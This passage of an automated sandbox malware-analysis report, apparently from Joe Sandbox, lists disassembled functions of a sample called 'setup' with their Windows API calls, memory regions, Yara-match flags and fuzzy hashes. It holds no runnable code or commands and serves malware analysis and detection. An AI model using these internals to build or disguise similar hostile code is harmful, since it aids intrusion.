                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$CreateMappingView
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3452162329-0
                                                                                                                          • Opcode ID: 8ea2e2618b6e6edc97158ba4fe73556ea2f7395a604561f0424a7f40c4f88d02
                                                                                                                          • Instruction ID: d56a39de4745bc0ac86f65277f171876b1042107c7c877036cbfa078665d7c95
                                                                                                                          • Opcode Fuzzy Hash: 8ea2e2618b6e6edc97158ba4fe73556ea2f7395a604561f0424a7f40c4f88d02
                                                                                                                          • Instruction Fuzzy Hash: F5922472D143248F9758EFF9EC86B6F3653FBC0310385822EE506C7566CF38458AAA85
                                                                                                                          Function 00C91EA0 Relevance: 4.2, APIs: 2, Instructions: 1212fileCOMMONLIBRARYCODE
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • CreateFileMappingW.KERNELBASE(?,00000000,?,-00000002C59711D4,00054AC4,00000000,00C72731,000000FF,000000FF,0000000A,00000000,00000000), ref: 00C92660
                                                                                                                          • MapViewOfFile.KERNEL32(00000001,?,?,-30C80583,-5BD6DA1A,?,00000000,?,-00000002C59711D4,00054AC4,00000000,00C72731,000000FF,000000FF,0000000A,00000000), ref: 00C92CE7
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$CreateMappingView
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3452162329-0
                                                                                                                          • Opcode ID: 1265a7ba15ea33c2b7f85c2cae139dd4f6fe2dbc045da86f09b2d868b1205969
                                                                                                                          • Instruction ID: 709b7aa519e929c5e4bab4363fa1aa1dc23331ca7e08eefc8317504db6751d85
                                                                                                                          • Opcode Fuzzy Hash: 1265a7ba15ea33c2b7f85c2cae139dd4f6fe2dbc045da86f09b2d868b1205969
                                                                                                                          • Instruction Fuzzy Hash: 65822572D143248F9758EFF9EC86B6F3663F7C0315381822EE506C7566CF38458AAA85
                                                                                                                          Function 00C91EC0 Relevance: 4.2, APIs: 2, Instructions: 1178COMMONLIBRARYCODE
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 0153c90eee837100f26d4890a9b719dbddabd2c6189362df37b6c21f91b6758e
                                                                                                                          • Instruction ID: 4bae91cca69a8c1a815423b79dad78ae3a2dc8e615f6a128f48b674e0859a11e
                                                                                                                          • Opcode Fuzzy Hash: 0153c90eee837100f26d4890a9b719dbddabd2c6189362df37b6c21f91b6758e
                                                                                                                          • Instruction Fuzzy Hash: F0822572D143248FD758EFF9EC86B6F3663F780315381822EE406C7566CF38458AAA85
                                                                                                                          Function 00C91F50 Relevance: 4.2, APIs: 2, Instructions: 1172fileCOMMONLIBRARYCODE
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • CreateFileMappingW.KERNELBASE(?,00000000,?,-00000002C59711D4,00054AC4,00000000,00C72731,000000FF,000000FF,0000000A,00000000,00000000), ref: 00C92660
                                                                                                                          • MapViewOfFile.KERNEL32(00000001,?,?,-30C80583,-5BD6DA1A,?,00000000,?,-00000002C59711D4,00054AC4,00000000,00C72731,000000FF,000000FF,0000000A,00000000), ref: 00C92CE7
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$CreateMappingView
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3452162329-0
                                                                                                                          • Opcode ID: 35f7c7b2aa11b699649ecb9a8dab4d9c50aa7215db6d9c234ee123058d503c23
                                                                                                                          • Instruction ID: ed9a962d1efaf3f0e18fbbfaec91c02d17a814522a095f5a08f5da573c9ad446
                                                                                                                          • Opcode Fuzzy Hash: 35f7c7b2aa11b699649ecb9a8dab4d9c50aa7215db6d9c234ee123058d503c23
                                                                                                                          • Instruction Fuzzy Hash: 4D821572D143248FD758EFF9EC86B6F3663F780315381822EE506C7566CF38458AAA85
                                                                                                                          Function 00C92100 Relevance: 4.1, APIs: 2, Instructions: 1052fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • CreateFileMappingW.KERNELBASE(?,00000000,?,-00000002C59711D4,00054AC4,00000000,00C72731,000000FF,000000FF,0000000A,00000000,00000000), ref: 00C92660
                                                                                                                          • MapViewOfFile.KERNEL32(00000001,?,?,-30C80583,-5BD6DA1A,?,00000000,?,-00000002C59711D4,00054AC4,00000000,00C72731,000000FF,000000FF,0000000A,00000000), ref: 00C92CE7
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$CreateMappingView
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3452162329-0
                                                                                                                          • Opcode ID: 176ad97db9e6c05b1259eb56cdaa4179db5fa0b9aa28a66f8917a7dac0b7c787
                                                                                                                          • Instruction ID: f2466a92b83dd5533f007eeacae6a2b60f23f3e3d8269ba793544405df139cdf
                                                                                                                          • Opcode Fuzzy Hash: 176ad97db9e6c05b1259eb56cdaa4179db5fa0b9aa28a66f8917a7dac0b7c787
                                                                                                                          • Instruction Fuzzy Hash: 8A721772D143248F9758EFF5EC86B6F3663F7C0315381822EE546C7566CF38058AAA85
                                                                                                                          Function 01020935 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 103threadCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 01020A01
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141412203.0000000001020000.00000040.10000000.00040000.00000000.sdmp, Offset: 01020000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_1020000_setup.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateThread
                                                                                                                          • String ID: ,
                                                                                                                          • API String ID: 2422867632-3772416878
                                                                                                                          • Opcode ID: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
                                                                                                                          • Instruction ID: 5a169bee906d7a2fbc5659f0aabe8cf2f4c104fd8931815df79c2d1b6211740e
                                                                                                                          • Opcode Fuzzy Hash: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
                                                                                                                          • Instruction Fuzzy Hash: CB41D674A00208EFDB14CF98C994BAEBBB1FF48314F208298E5556B385D771AE81CF94
                                                                                                                          Function 030211D0 Relevance: 2.6, Strings: 2, Instructions: 117COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4142025907.0000000003001000.00000020.10000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_3001000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: &2$sa
                                                                                                                          • API String ID: 0-4107202647
                                                                                                                          • Opcode ID: a6e5b0a940368d07e578e4167d905b5a874937ea1c343ecbbc6fbe134d8f83ee
                                                                                                                          • Instruction ID: 3ed770deeb6acf9e5c878459b0f91e11937bd39973992e1b2b257e494b818047
                                                                                                                          • Opcode Fuzzy Hash: a6e5b0a940368d07e578e4167d905b5a874937ea1c343ecbbc6fbe134d8f83ee
                                                                                                                          • Instruction Fuzzy Hash: 8D21E1746192118BC718DF78D92267BBBF8EF86360F095A58F491CB2D0E3788904C796
                                                                                                                          Function 01020375 Relevance: 1.9, APIs: 1, Instructions: 399threadCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,00000001,?,81EC8B55,000000FF), ref: 01020618
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141412203.0000000001020000.00000040.10000000.00040000.00000000.sdmp, Offset: 01020000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_1020000_setup.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateThread
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2422867632-0
                                                                                                                          • Opcode ID: 5f42c132f51e34ae2641bd4efc314dbf00ff32d40d4309430f450c8b04517298
                                                                                                                          • Instruction ID: f36bff3c7e37a5e8facf58508540f3edd23c5076c54c6eaaa3cbf3227933ebe0
                                                                                                                          • Opcode Fuzzy Hash: 5f42c132f51e34ae2641bd4efc314dbf00ff32d40d4309430f450c8b04517298
                                                                                                                          • Instruction Fuzzy Hash: C712A2B4E00219DBDB14CF98C990BEDBBB2FF48304F2482A9E555AB385D735AA41CF54
                                                                                                                          Function 0302E87F Relevance: 1.9, APIs: 1, Instructions: 375COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetPhysicallyInstalledSystemMemory.KERNEL32(?), ref: 0302F5BE
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4142025907.0000000003001000.00000020.10000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_3001000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InstalledMemoryPhysicallySystem
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3960555810-0
                                                                                                                          • Opcode ID: 7f095281fc444ba06453ba0578510f886cf293e4cddf27d1dc7bc9a981f0bbf8
                                                                                                                          • Instruction ID: 216f79eab66e2a699afd26a8e6d1daab36fe1d77e9afbf82f4e362f465bbe270
                                                                                                                          • Opcode Fuzzy Hash: 7f095281fc444ba06453ba0578510f886cf293e4cddf27d1dc7bc9a981f0bbf8
                                                                                                                          • Instruction Fuzzy Hash: 67C1AE712057528FD725CF29C4A0766FBE1BF9A300F1885AEC4DA8B792D775E406CB50
                                                                                                                          Function 03018664 Relevance: 1.6, APIs: 1, Instructions: 149COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4142025907.0000000003001000.00000020.10000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_3001000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 67316d0b7e05ba9a9a4c3cd1c1ae785c5e99c121ab9f3abae23639672ca08d4e
                                                                                                                          • Instruction ID: 52ae9cbc3f062e4504939c0ae344f9e4a7f0a456b6618f8bfa708e7e457b8603
                                                                                                                          • Opcode Fuzzy Hash: 67316d0b7e05ba9a9a4c3cd1c1ae785c5e99c121ab9f3abae23639672ca08d4e
                                                                                                                          • Instruction Fuzzy Hash: 0641E7B59093429FC718CF28C4917ABBBE5AFC5204F188A2DE5D9C7381E734D915CB82
                                                                                                                          Function 03043BC0 Relevance: 1.6, Strings: 1, Instructions: 351COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4142025907.0000000003001000.00000020.10000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_3001000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID: Wuv7
                                                                                                                          • API String ID: 2994545307-3833346499
                                                                                                                          • Opcode ID: 485168866f73bcb739d5779370c0cedb4cbd6d054a3a58cfa83b3dba23d5600b
                                                                                                                          • Instruction ID: 42b113ecd0230f6237cb80619394eb7b5d5ab1ab35e323cbcc69c42415e4bbfa
                                                                                                                          • Opcode Fuzzy Hash: 485168866f73bcb739d5779370c0cedb4cbd6d054a3a58cfa83b3dba23d5600b
                                                                                                                          • Instruction Fuzzy Hash: CBA136BAB193119FC718DE68C88176BB7E1EB88314F09967CE8A5CB391D734DA058781
                                                                                                                          Function 03040BE0 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • LdrInitializeThunk.NTDLL(03044250,76E87000,00000018,?,?,00000018,?,?,?), ref: 03040C0E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4142025907.0000000003001000.00000020.10000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_3001000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                          • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                                          • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                          • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                                                          Function 03043110 Relevance: 1.3, Strings: 1, Instructions: 73COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4142025907.0000000003001000.00000020.10000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_3001000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID: @
                                                                                                                          • API String ID: 2994545307-2766056989
                                                                                                                          • Opcode ID: f51696113eb4e327f7ae3f619a354225ea47d73f9eee910d73a8092a6ad56faa
                                                                                                                          • Instruction ID: ed963d3f28a82959bf080f4d449fe4fb5d34b3d5a333956d86f77583c84ab1e7
                                                                                                                          • Opcode Fuzzy Hash: f51696113eb4e327f7ae3f619a354225ea47d73f9eee910d73a8092a6ad56faa
                                                                                                                          • Instruction Fuzzy Hash: 5A21F2B550A3049BD314DF58C8C166BF7F4FF89324F15AA2CE968472E0D336DA188B96
                                                                                                                          Function 030431F0 Relevance: .4, Instructions: 353COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4142025907.0000000003001000.00000020.10000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_3001000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: f6ebb2a83c5bc91e70621438602d4f9a9cd25702fd611ad025519b3800cd0f99
                                                                                                                          • Instruction ID: 2b87695480ceee39be87d6097082bbaf3201edbccf0a5ca6af6573f29e51dadf
                                                                                                                          • Opcode Fuzzy Hash: f6ebb2a83c5bc91e70621438602d4f9a9cd25702fd611ad025519b3800cd0f99
                                                                                                                          • Instruction Fuzzy Hash: F4B14676A093108BD714DF28C89066FB7E1FFC4314F0996BCD8D99B291EB34DA158781
                                                                                                                          Function 03028780 Relevance: .3, Instructions: 331COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4142025907.0000000003001000.00000020.10000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_3001000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 597feed10584dc727962c8a409781f9e7ef7a6d8a72189cfac9957ddf4816537
                                                                                                                          • Instruction ID: 01bb1f6a35c514b0d9b7d2eec70899516c83f8769479858db118537b49f060e0
                                                                                                                          • Opcode Fuzzy Hash: 597feed10584dc727962c8a409781f9e7ef7a6d8a72189cfac9957ddf4816537
                                                                                                                          • Instruction Fuzzy Hash: 0CA19EBAA063205BE714DE24DC9173BBAD7EFD5304F1DC53CE8859B285E6389D058392
                                                                                                                          Function 03041092 Relevance: .2, Instructions: 247COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4142025907.0000000003001000.00000020.10000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_3001000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 4ce254eab85abe4ba5409214a594d3acffff572236845981582d63cc14067286
                                                                                                                          • Instruction ID: 096abbea50ff2c77f70fcc77a9c6eaceddb63095931536afa2adc5759f8b6f41
                                                                                                                          • Opcode Fuzzy Hash: 4ce254eab85abe4ba5409214a594d3acffff572236845981582d63cc14067286
                                                                                                                          • Instruction Fuzzy Hash: 5981E0B96422008BD718CF65C89176ABBE3FFC8321F1CC2BCC4458B759DB7899468790
                                                                                                                          Function 0303F220 Relevance: .2, Instructions: 208COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4142025907.0000000003001000.00000020.10000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_3001000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 45d2de15aa49bb093fedcbe424a56aa6b240e143da53ac668ee22c79644bded3
                                                                                                                          • Instruction ID: f9966da4349eca268e9583181cf06ee88fc948dfc9133847905b09d4a86387f7
                                                                                                                          • Opcode Fuzzy Hash: 45d2de15aa49bb093fedcbe424a56aa6b240e143da53ac668ee22c79644bded3
                                                                                                                          • Instruction Fuzzy Hash: 3E5139B5E0A7019BD354DE28D840B6BF3EBABC6314F19C63CE8999B295E731DC018781
                                                                                                                          Function 0303BB80 Relevance: .2, Instructions: 174COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4142025907.0000000003001000.00000020.10000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_3001000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: b9e6763a1d344406fe9a887a77949c58c0caf34a0f4062ea90d0258b25688924
                                                                                                                          • Instruction ID: 0ddfaec357c5476707828ea0820ff062de26cb75b3df10ef175240af4ffd3386
                                                                                                                          • Opcode Fuzzy Hash: b9e6763a1d344406fe9a887a77949c58c0caf34a0f4062ea90d0258b25688924
                                                                                                                          • Instruction Fuzzy Hash: 8F51F87661B7108FD324CA28C55036EBBD6ABC6328F198B2DE4A58B3D1D774C945C782
                                                                                                                          Function 0300C306 Relevance: .2, Instructions: 167COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4142025907.0000000003001000.00000020.10000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_3001000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 897ef1cf6222e2784aff91f6058a266ea0e8f90faa83ece5fdef40f295fc54b3
                                                                                                                          • Instruction ID: 27f5e4733ec5c5e376a434c250600ec191e05fce150ad63956644b05609b649f
                                                                                                                          • Opcode Fuzzy Hash: 897ef1cf6222e2784aff91f6058a266ea0e8f90faa83ece5fdef40f295fc54b3
                                                                                                                          • Instruction Fuzzy Hash: C451F97125C3818FE310CF58CC8076BB7E2FBC5314F18896CE6915B6C2D7B999048B86
                                                                                                                          Function 00C3E131 Relevance: 15.1, APIs: 10, Instructions: 124memoryCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 580 c3e131-c3e153 EnterCriticalSection 581 c3e155-c3e159 580->581 582 c3e169-c3e16c 580->582 585 c3e15f-c3e163 581->585 586 c3e26e 581->586 583 c3e199-c3e19b 582->583 584 c3e16e-c3e171 582->584 588 c3e19c-c3e1a5 583->588 584->586 587 c3e177-c3e17c 584->587 585->582 590 c3e22a-c3e230 585->590 589 c3e271-c3e27c LeaveCriticalSection call c2dd3f 586->589 591 c3e17f-c3e182 587->591 594 c3e1a7-c3e1ba call c2659e GlobalAlloc 588->594 595 c3e1bc-c3e1c9 GlobalHandle 588->595 592 c3e232 590->592 593 c3e235-c3e24f LeaveCriticalSection 590->593 597 c3e184-c3e18a 591->597 598 c3e18c-c3e18e 591->598 592->593 609 c3e1f1-c3e1f3 594->609 600 c3e250-c3e253 595->600 601 c3e1cf-c3e1eb GlobalUnlock call c2659e GlobalReAlloc 595->601 597->591 597->598 598->590 603 c3e194-c3e197 598->603 604 c3e255-c3e25f GlobalHandle 600->604 605 c3e268-c3e26c 600->605 601->609 603->588 604->605 608 c3e261-c3e262 GlobalLock 604->608 605->589 608->605 609->600 611 c3e1f5-c3e203 GlobalLock 609->611 611->605 612 c3e205-c3e228 call c6dd50 611->612 612->590
                                                                                                                          APIs
                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 00C3E142
                                                                                                                          • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00C3E1B4
                                                                                                                          • GlobalHandle.KERNEL32(?), ref: 00C3E1BE
                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00C3E1D0
                                                                                                                          • GlobalReAlloc.KERNEL32(?,00000000,00002002), ref: 00C3E1EB
                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00C3E1F6
                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 00C3E243
                                                                                                                          • GlobalHandle.KERNEL32(?), ref: 00C3E257
                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00C3E262
                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 00C3E271
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2667261700-0
                                                                                                                          • Opcode ID: 2deaf5bc22934e9bf51235a81862553461264d0e2614621739c3a2df5ef1f948
                                                                                                                          • Instruction ID: e22ba81acff3e23dfad1d565a284a1f007606236423dd2dd380a5d528ffdbae0
                                                                                                                          • Opcode Fuzzy Hash: 2deaf5bc22934e9bf51235a81862553461264d0e2614621739c3a2df5ef1f948
                                                                                                                          • Instruction Fuzzy Hash: C1416D71610216EFDB189F64D889BAEBBF8FF05301F10426AE815D75E1EB71EA50CB90
                                                                                                                          Function 00C3DEEC Relevance: 12.0, APIs: 8, Instructions: 34COMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          • KiUserCallbackDispatcher.NTDLL(0000000B), ref: 00C3DEF2
